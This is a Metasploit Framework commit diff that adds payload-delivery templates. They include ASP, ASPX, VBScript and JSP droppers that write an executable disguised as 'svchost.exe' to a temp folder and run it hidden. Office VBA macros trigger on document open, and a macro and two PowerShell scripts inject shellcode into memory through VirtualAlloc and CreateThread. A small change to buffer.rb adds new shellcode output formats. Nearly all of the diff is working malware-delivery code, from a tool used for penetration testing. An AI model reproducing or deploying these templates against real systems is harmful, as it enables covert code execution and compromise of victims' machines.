Land rapid7#2270, Util::EXE refactor

With a minor rebase to fix a commit message

[Closes rapid7#2270]

Conflicts:
	spec/support/shared/contexts/msf/util/exe.rb

Author: egypt

data/templates/scripts/to_exe.asp.template

@@ -0,0 +1,24 @@
+<%% @language="VBScript" %%>
+<%% 
+	Sub %{var_func}()
+		%{var_shellcode}
+		Dim %{var_obj}
+		Set %{var_obj} = CreateObject("Scripting.FileSystemObject")
+		Dim %{var_stream}
+		Dim %{var_tempdir}
+		Dim %{var_tempexe}
+		Dim %{var_basedir}
+		Set %{var_tempdir} = %{var_obj}.GetSpecialFolder(2)
+		%{var_basedir} = %{var_tempdir} & "\" & %{var_obj}.GetTempName()
+		%{var_obj}.CreateFolder(%{var_basedir})
+		%{var_tempexe} = %{var_basedir} & "\" & "svchost.exe"
+		Set %{var_stream} = %{var_obj}.CreateTextFile(%{var_tempexe},2,0)
+		%{var_stream}.Write %{var_bytes}
+		%{var_stream}.Close
+		Dim %{var_shell}
+		Set %{var_shell} = CreateObject("Wscript.Shell")
+		%{var_shell}.run %{var_tempexe}, 0, false
+	End Sub
+
+	%{var_func}
+%%>

data/templates/scripts/to_exe.aspx.template

@@ -0,0 +1,30 @@
+<%%@ Page Language="C#" AutoEventWireup="true" %%>
+<%%@ Import Namespace="System.IO" %%>
+<script runat="server">
+	protected void Page_Load(object sender, EventArgs e)
+	{
+		%{shellcode}
+		string %{var_tempdir} = Path.GetTempPath();
+		string %{var_basedir} = Path.Combine(%{var_tempdir}, "%{var_filename}");
+		string %{var_tempexe} = Path.Combine(%{var_basedir}, "svchost.exe");
+		
+		Directory.CreateDirectory(%{var_basedir});
+		
+		FileStream fs = File.Create(%{var_tempexe});
+		
+		try
+		{
+			fs.Write(%{var_file}, 0, %{var_file}.Length);
+		}
+		finally
+		{
+			if (fs != null) ((IDisposable)fs).Dispose();
+		}
+
+		System.Diagnostics.Process %{var_proc} = new System.Diagnostics.Process();
+		%{var_proc}.StartInfo.CreateNoWindow = true;
+		%{var_proc}.StartInfo.UseShellExecute = true;
+		%{var_proc}.StartInfo.FileName = %{var_tempexe};
+		%{var_proc}.Start();
+	}
+</script>

data/templates/scripts/to_exe.vba.template

@@ -0,0 +1,81 @@
+'**************************************************************
+'*
+'* This code is now split into two pieces:
+'*  1. The Macro. This must be copied into the Office document
+'*     macro editor. This macro will run on startup.
+'*
+'*  2. The Data. The hex dump at the end of this output must be
+'*     appended to the end of the document contents.
+'*
+'**************************************************************
+'*
+'* MACRO CODE
+'*
+'**************************************************************
+
+Sub Auto_Open()
+	%{func_name1}
+End Sub
+
+Sub %{func_name1}()
+	Dim %{var_appnr} As Integer
+	Dim %{var_fname} As String
+	Dim %{var_fenvi} As String
+	Dim %{var_fhand} As Integer
+	Dim %{var_parag} As Paragraph
+	Dim %{var_index} As Integer
+	Dim %{var_gotmagic} As Boolean
+	Dim %{var_itemp} As Integer
+	Dim %{var_stemp} As String
+	Dim %{var_btemp} As Byte
+	Dim %{var_magic} as String
+	%{var_magic} = "%{var_magic}"
+	%{var_fname} = "%{filename}.exe"
+	%{var_fenvi} = Environ("USERPROFILE")
+	ChDrive (%{var_fenvi})
+	ChDir (%{var_fenvi})
+	%{var_fhand} = FreeFile()
+	Open %{var_fname} For Binary As %{var_fhand}
+	For Each %{var_parag} in ActiveDocument.Paragraphs
+		DoEvents
+			%{var_stemp} = %{var_parag}.Range.Text
+		If (%{var_gotmagic} = True) Then
+			%{var_index} = 1
+			While (%{var_index} < Len(%{var_stemp}))
+				%{var_btemp} = Mid(%{var_stemp},%{var_index},4)
+				Put #%{var_fhand}, , %{var_btemp}
+				%{var_index} = %{var_index} + 4
+			Wend
+		ElseIf (InStr(1,%{var_stemp},%{var_magic}) > 0 And Len(%{var_stemp}) > 0) Then
+			%{var_gotmagic} = True
+		End If
+	Next
+	Close #%{var_fhand}
+	%{func_name2}(%{var_fname})
+End Sub
+
+Sub %{func_name2}(%{var_farg} As String)
+	Dim %{var_appnr} As Integer
+	Dim %{var_fenvi} As String
+	%{var_fenvi} = Environ("USERPROFILE")
+	ChDrive (%{var_fenvi})
+	ChDir (%{var_fenvi})
+	%{var_appnr} = Shell(%{var_farg}, vbHide)
+End Sub
+
+Sub AutoOpen()
+	Auto_Open
+End Sub
+
+Sub Workbook_Open()
+	Auto_Open
+End Sub
+
+'**************************************************************
+'*
+'* PAYLOAD DATA
+'*
+'**************************************************************
+
+%{var_magic}
+%{data}

data/templates/scripts/to_exe.vbs.template

@@ -0,0 +1,24 @@
+Function %{var_func}()
+%{var_shellcode}
+
+	Dim %{var_obj}
+	Set %{var_obj} = CreateObject("Scripting.FileSystemObject")
+	Dim %{var_stream}
+	Dim %{var_tempdir}
+	Dim %{var_tempexe}
+	Dim %{var_basedir}
+	Set %{var_tempdir} = %{var_obj}.GetSpecialFolder(2)
+	%{var_basedir} = %{var_tempdir} & "\" & %{var_obj}.GetTempName()
+	%{var_obj}.CreateFolder(%{var_basedir})
+	%{var_tempexe} = %{var_basedir} & "\" & "svchost.exe"
+	Set %{var_stream} = %{var_obj}.CreateTextFile(%{var_tempexe}, true , false)
+	%{var_stream}.Write %{var_bytes}
+	%{var_stream}.Close
+	Dim %{var_shell}
+	Set %{var_shell} = CreateObject("Wscript.Shell")
+	%{var_shell}.run %{var_tempexe}, 0, true
+	%{var_obj}.DeleteFile(%{var_tempexe})
+	%{var_obj}.DeleteFolder(%{var_basedir})
+End Function
+
+%{init}

data/templates/scripts/to_exe_jsp.war.template

@@ -0,0 +1,49 @@
+<%%@ page import="java.io.*" %%>
+<%%
+	String %{var_hexpath} = application.getRealPath("/") + "/%{var_hexfile}.txt";
+	String %{var_exepath} = System.getProperty("java.io.tmpdir") + "/%{var_exe}";
+	String %{var_data} = "";
+
+	if (System.getProperty("os.name").toLowerCase().indexOf("windows") != -1)
+	{
+		%{var_exepath} = %{var_exepath}.concat(".exe");
+	}
+
+	FileInputStream %{var_inputstream} = new FileInputStream(%{var_hexpath});
+	FileOutputStream %{var_outputstream} = new FileOutputStream(%{var_exepath});
+
+	int %{var_numbytes} = %{var_inputstream}.available();
+	byte %{var_bytearray}[] = new byte[%{var_numbytes}];
+	%{var_inputstream}.read(%{var_bytearray});
+	%{var_inputstream}.close();
+	byte[] %{var_bytes} = new byte[%{var_numbytes}/2];
+	for (int %{var_counter} = 0; %{var_counter} < %{var_numbytes}; %{var_counter} += 2)
+	{
+		char %{var_char1} = (char) %{var_bytearray}[%{var_counter}];
+		char %{var_char2} = (char) %{var_bytearray}[%{var_counter} + 1];
+		int %{var_comb} = Character.digit(%{var_char1}, 16) & 0xff;
+		%{var_comb} <<= 4;
+		%{var_comb} += Character.digit(%{var_char2}, 16) & 0xff;
+		%{var_bytes}[%{var_counter}/2] = (byte)%{var_comb};
+	}
+
+	%{var_outputstream}.write(%{var_bytes});
+	%{var_outputstream}.close();
+
+	if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1){
+		String[] %{var_fperm} = new String[3];
+		%{var_fperm}[0] = "chmod";
+		%{var_fperm}[1] = "+x";
+		%{var_fperm}[2] = %{var_exepath};
+		Process %{var_proc} = Runtime.getRuntime().exec(%{var_fperm});
+		if (%{var_proc}.waitFor() == 0) {
+			%{var_proc} = Runtime.getRuntime().exec(%{var_exepath});
+		}
+		
+		File %{var_fdel} = new File(%{var_exepath}); %{var_fdel}.delete();
+	} 
+	else 
+	{
+		Process %{var_proc} = Runtime.getRuntime().exec(%{var_exepath});
+	}
+%%>

data/templates/scripts/to_mem.vba.template

@@ -0,0 +1,32 @@
+#If Vba7 Then
+	Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal %{var_lpThreadAttributes} As Long, ByVal %{var_dwStackSize} As Long, ByVal %{var_lpStartAddress} As LongPtr, %{var_lpParameter} As Long, ByVal %{var_dwCreationFlags} As Long, %{var_lpThreadID} As Long) As LongPtr
+	Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal %{var_lpAddr} As Long, ByVal %{var_lSize} As Long, ByVal %{var_flAllocationType} As Long, ByVal %{var_flProtect} As Long) As LongPtr
+	Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal %{var_lDest} As LongPtr, ByRef %{var_Source} As Any, ByVal %{var_Length} As Long) As LongPtr
+#Else
+	Private Declare Function CreateThread Lib "kernel32" (ByVal %{var_lpThreadAttributes} As Long, ByVal %{var_dwStackSize} As Long, ByVal %{var_lpStartAddress} As Long, %{var_lpParameter} As Long, ByVal %{var_dwCreationFlags} As Long, %{var_lpThreadID} As Long) As Long
+	Private Declare Function VirtualAlloc Lib "kernel32" (ByVal %{var_lpAddr} As Long, ByVal %{var_lSize} As Long, ByVal %{var_flAllocationType} As Long, ByVal %{var_flProtect} As Long) As Long
+	Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal %{var_lDest} As Long, ByRef %{var_Source} As Any, ByVal %{var_Length} As Long) As Long
+#EndIf
+
+Sub Auto_Open()
+	Dim %{var_myByte} As Long, %{var_myArray} As Variant, %{var_offset} As Long
+#If Vba7 Then
+	Dim  %{var_rwxpage} As LongPtr, %{var_res} As LongPtr
+#Else
+	Dim  %{var_rwxpage} As Long, %{var_res} As Long
+#EndIf
+	%{bytes}
+	%{var_rwxpage} = VirtualAlloc(0, UBound(%{var_myArray}), &H1000, &H40)
+	For %{var_offset} = LBound(%{var_myArray}) To UBound(%{var_myArray})
+		%{var_myByte} = %{var_myArray}(%{var_offset})
+		%{var_res} = RtlMoveMemory(%{var_rwxpage} + %{var_offset}, %{var_myByte}, 1)
+	Next %{var_offset}
+	%{var_res} = CreateThread(0, 0, %{var_rwxpage}, 0, 0, 0)
+End Sub
+Sub AutoOpen()
+	Auto_Open
+End Sub
+Sub Workbook_Open()
+	Auto_Open
+End Sub
+

data/templates/scripts/to_mem_dotnet.ps1.template

@@ -0,0 +1,30 @@
+Set-StrictMode -Version 2
+$%{var_syscode} = @"
+	using System;
+	using System.Runtime.InteropServices;
+	namespace %{var_kernel32} {
+		public class func {
+			[Flags] public enum AllocationType { Commit = 0x1000, Reserve = 0x2000 }
+			[Flags] public enum MemoryProtection { ExecuteReadWrite = 0x40 }
+			[Flags] public enum Time : uint { Infinite = 0xFFFFFFFF }
+			[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
+			[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
+			[DllImport("kernel32.dll")] public static extern int WaitForSingleObject(IntPtr hHandle, Time dwMilliseconds);
+		}
+	}
+"@
+
+$%{var_codeProvider} = New-Object Microsoft.CSharp.CSharpCodeProvider
+$%{var_compileParams} = New-Object System.CodeDom.Compiler.CompilerParameters
+$%{var_compileParams}.ReferencedAssemblies.AddRange(@("System.dll", [PsObject].Assembly.Location))
+$%{var_compileParams}.GenerateInMemory = $True
+$%{var_output} = $%{var_codeProvider}.CompileAssemblyFromSource($%{var_compileParams}, $%{var_syscode})
+
+%{shellcode}
+
+$%{var_baseaddr} = [%{var_kernel32}.func]::VirtualAlloc(0, $%{var_code}.Length + 1, [%{var_kernel32}.func+AllocationType]::Reserve -bOr [%{var_kernel32}.func+AllocationType]::Commit, [%{var_kernel32}.func+MemoryProtection]::ExecuteReadWrite)
+if ([Bool]!$%{var_baseaddr}) { $global:result = 3; return }
+[System.Runtime.InteropServices.Marshal]::Copy($%{var_code}, 0, $%{var_baseaddr}, $%{var_code}.Length)
+[IntPtr] $%{var_threadHandle} = [%{var_kernel32}.func]::CreateThread(0,0,$%{var_baseaddr},0,0,0)
+if ([Bool]!$%{var_threadHandle}) { $global:result = 7; return }
+$%{var_temp} = [%{var_kernel32}.func]::WaitForSingleObject($%{var_threadHandle}, [%{var_kernel32}.func+Time]::Infinite)

data/templates/scripts/to_mem_old.ps1.template

@@ -0,0 +1,20 @@
+$%{var_syscode} = @"
+[DllImport("kernel32.dll")]
+public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
+[DllImport("kernel32.dll")]
+public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
+[DllImport("msvcrt.dll")]
+public static extern IntPtr memset(IntPtr dest, uint src, uint count);
+"@
+
+$%{var_win32_func} = Add-Type -memberDefinition $%{var_syscode} -Name "Win32" -namespace Win32Functions -passthru
+
+%{shellcode}
+
+$%{var_rwx} = $%{var_win32_func}::VirtualAlloc(0,0x1000,[Math]::Max($%{var_code}.Length, 0x1000),0x40)
+
+for ($%{var_iter}=0;$%{var_iter} -le ($%{var_code}.Length-1);$%{var_iter}++) {
+	$%{var_win32_func}::memset([IntPtr]($%{var_rwx}.ToInt32()+$%{var_iter}), $%{var_code}[$%{var_iter}], 1) | Out-Null
+}
+
+$%{var_win32_func}::CreateThread(0,0,$%{var_rwx},0,0,0)

lib/msf/base/simple/buffer.rb

@@ -16,7 +16,7 @@ module Buffer
 
 	#
 	# Serializes a buffer to a provided format.  The formats supported are raw,
-	# ruby, perl, bash, c, js_be, js_le and java
+	# ruby, perl, bash, c, js_be, js_le, java and psh
 	#
 	def self.transform(buf, fmt = "ruby")
 		case fmt
@@ -39,6 +39,12 @@ def self.transform(buf, fmt = "ruby")
 				buf = Rex::Text.to_unescape(buf, ENDIAN_LITTLE)
 			when 'java'
 				buf = Rex::Text.to_java(buf)
+			when 'powershell', 'ps1'
+				buf = Rex::Text.to_powershell(buf)
+			when 'vbscript'
+				buf = Rex::Text.to_vbscript(buf)
+			when 'vbapplication'
+				buf = Rex::Text.to_vbapplication(buf)
 			else
 				raise ArgumentError, "Unsupported buffer format: #{fmt}", caller
 		end
@@ -78,7 +84,20 @@ def self.comment(buf, fmt = "ruby")
 	# Returns the list of supported formats
 	#
 	def self.transform_formats
-		['raw','ruby','rb','perl','pl','bash','sh','c','csharp','js_be','js_le','java','python','py']
+		['raw',
+		'ruby','rb',
+		'perl','pl',
+		'bash','sh',
+		'c',
+		'csharp',
+		'js_be',
+		'js_le',
+		'java',
+		'python','py',
+		'powershell','ps1',
+		'vbscript',
+		'vbapplication'
+		]
 	end
 
 end